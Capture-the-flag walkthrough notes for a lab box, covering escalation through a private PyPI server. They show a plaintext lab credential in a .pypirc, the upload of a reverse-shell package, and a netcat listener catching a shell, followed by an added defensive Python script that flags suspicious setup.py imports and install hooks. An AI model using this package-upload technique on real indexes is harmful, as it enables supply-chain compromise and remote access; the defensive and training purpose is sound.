9 localhost:5000 > low

developer@sneakymailer:/tmp$ curl localhost:5000
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Welcome to pypiserver!</title>
  </head><body><h1>Welcome to pypiserver!</h1>
  <p>This is a PyPI compatible package index serving 0 packages.</p>
    <p>To use this server with <code>pip</code>, run the following command:
	<pre><code>pip install --index-url http://localhost:5000/simple/ PACKAGE [PACKAGE2...]</code>
      </pre></p>
    <p>To use this server with <code>easy_install</code>, run the following command: 
	<pre><code>easy_install --index-url http://localhost:5000/simple/ PACKAGE [PACKAGE2...]</code></pre></p>
    <p>The complete list of all packages can be found <a href="/packages/">here</a> or via the <a href="/simple/">simple</a> index.</p>
    <p>This instance is running version 1.3.2 of the <a href="https://pypi.org/project/pypiserver/">pypiserver</a> software.</p>
  </body></html>
  
# it's a PyPI server, time to port forward using chisel
| same as http://pypi.sneakycorp.htb:8080/

Reading https://pypi.org/project/pypiserver/
| https://pypi.org/project/pypiserver/#uploading-packages-remotely
this talks about authentication

# the way the process is running
pypi       683  0.0  0.6  36800 26152 ?        Ss   Sep29   0:07 /var/www/pypi.sneakycorp.htb/venv/bin/python3 /var/www/pypi.sneakycorp.htb/venv/bin/pypi-server -i 127.0.0.1 -p 5000 -a update,download,list -P /var/www/pypi.sneakycorp.htb/.htpasswd --disable-fallback -o /var/www/pypi.sneakycorp.htb/packages

# -a: actions for which a password will be needed
# -P: password file
# --disable-fallback: will not revert to system pip in case of errors

we need to create a malicious Python package and upload it to the index
| https://www.linode.com/docs/guides/how-to-create-a-private-python-package-repository/
Using https://github.com/iamkashz/pypi-revshell

# using setuptools to upload
https://pypi.org/project/pypiserver/#upload-with-setuptools

# create file ~/.pypirc
[distutils]
index-servers =
  sneakymailer

[sneakymailer]
repository: http://pypi.sneakycorp.htb:8080/
username: pypi
password: soufianeelhaoui

# to create the package
$ python setup.py sdist
Creating tar archive
# the tarball is written under dist/

$ python setup.py sdist upload -r sneakymailer
running sdist
running egg_info
writing pypi_revshell.egg-info/PKG-INFO
writing top-level names to pypi_revshell.egg-info/top_level.txt
writing dependency_links to pypi_revshell.egg-info/dependency_links.txt
reading manifest file 'pypi_revshell.egg-info/SOURCES.txt'
writing manifest file 'pypi_revshell.egg-info/SOURCES.txt'
running check
warning: check: missing required meta-data: url

creating pypi-revshell-0.0.1
creating pypi-revshell-0.0.1/pypi_revshell.egg-info
copying files to pypi-revshell-0.0.1...
copying README.md -> pypi-revshell-0.0.1
copying setup.cfg -> pypi-revshell-0.0.1
copying setup.py -> pypi-revshell-0.0.1
copying pypi_revshell.egg-info/PKG-INFO -> pypi-revshell-0.0.1/pypi_revshell.egg-info
copying pypi_revshell.egg-info/SOURCES.txt -> pypi-revshell-0.0.1/pypi_revshell.egg-info
copying pypi_revshell.egg-info/dependency_links.txt -> pypi-revshell-0.0.1/pypi_revshell.egg-info
copying pypi_revshell.egg-info/not-zip-safe -> pypi-revshell-0.0.1/pypi_revshell.egg-info
copying pypi_revshell.egg-info/top_level.txt -> pypi-revshell-0.0.1/pypi_revshell.egg-info
Writing pypi-revshell-0.0.1/setup.cfg
Creating tar archive
removing 'pypi-revshell-0.0.1' (and everything under it)
running upload
Submitting dist/pypi-revshell-0.0.1.tar.gz to http://pypi.sneakycorp.htb:8080/
Server response (200): OK

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.197] 57994
low@sneakymailer:/$ whoami;id;hostname
whoami;id;hostname
low
uid=1000(low) gid=1000(low) groups=1000(low),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),119(pypi-pkg)
sneakymailer

# can put in SSH keys and get a stable shell
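From the defender's side, the weak point above is that a private pypiserver accepts any sdist from an authenticated user and `pip install` then executes its setup.py. The following is an added example (not from the original notes or from pypiserver) of a pre-acceptance triage script: it unpacks an sdist in memory, parses every setup.py with `ast`, and flags the two things the technique above relies on, imports of execution-capable modules and a `cmdclass` override of the install command. Package names, file layout and the two sample setup.py strings are constructed for the demo.

```python
import ast
import io
import tarfile

# Modules whose appearance in a setup.py deserves a human look before acceptance.
SUSPICIOUS_MODULES = {"os", "subprocess", "socket", "pty", "urllib", "base64", "ctypes"}


def audit_setup_py(source):
    """Return a list of findings for one setup.py source string."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in SUSPICIOUS_MODULES:
                    findings.append(f"line {node.lineno}: imports {alias.name}")
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in SUSPICIOUS_MODULES:
                findings.append(f"line {node.lineno}: imports from {node.module}")
        elif isinstance(node, ast.Call):
            # setup(..., cmdclass={...}) replaces the install/develop commands,
            # which is how a package runs arbitrary code during `pip install`.
            if isinstance(node.func, ast.Name) and node.func.id == "setup":
                if any(kw.arg == "cmdclass" for kw in node.keywords):
                    findings.append(f"line {node.lineno}: setup() overrides cmdclass")
    return findings


def audit_sdist(tar_bytes):
    """Scan every setup.py inside an sdist (.tar.gz); map member name -> findings."""
    report = {}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile() and member.name.endswith("setup.py"):
                src = tar.extractfile(member).read().decode("utf-8", "replace")
                report[member.name] = audit_setup_py(src)
    return report


def build_sample_sdist(setup_py):
    """Constructed fixture: a minimal sdist holding only a setup.py."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        data = setup_py.encode()
        info = tarfile.TarInfo("demo-0.0.1/setup.py")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed samples: a plain package and one that hooks the install command.
CLEAN_SETUP = "from setuptools import setup\nsetup(name='demo', version='0.0.1')\n"
HOOKED_SETUP = "import subprocess\nfrom setuptools import setup\nfrom setuptools.command.install import install\nclass PostInstall(install):\n    pass\nsetup(name='demo', version='0.0.1', cmdclass={'install': PostInstall})\n"
```

Running `audit_sdist(build_sample_sdist(HOOKED_SETUP))` reports the `subprocess` import and the `cmdclass` override, while the clean sample yields no findings; a real gate would also check that uploaders are individually authenticated rather than sharing one `.pypirc` credential.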
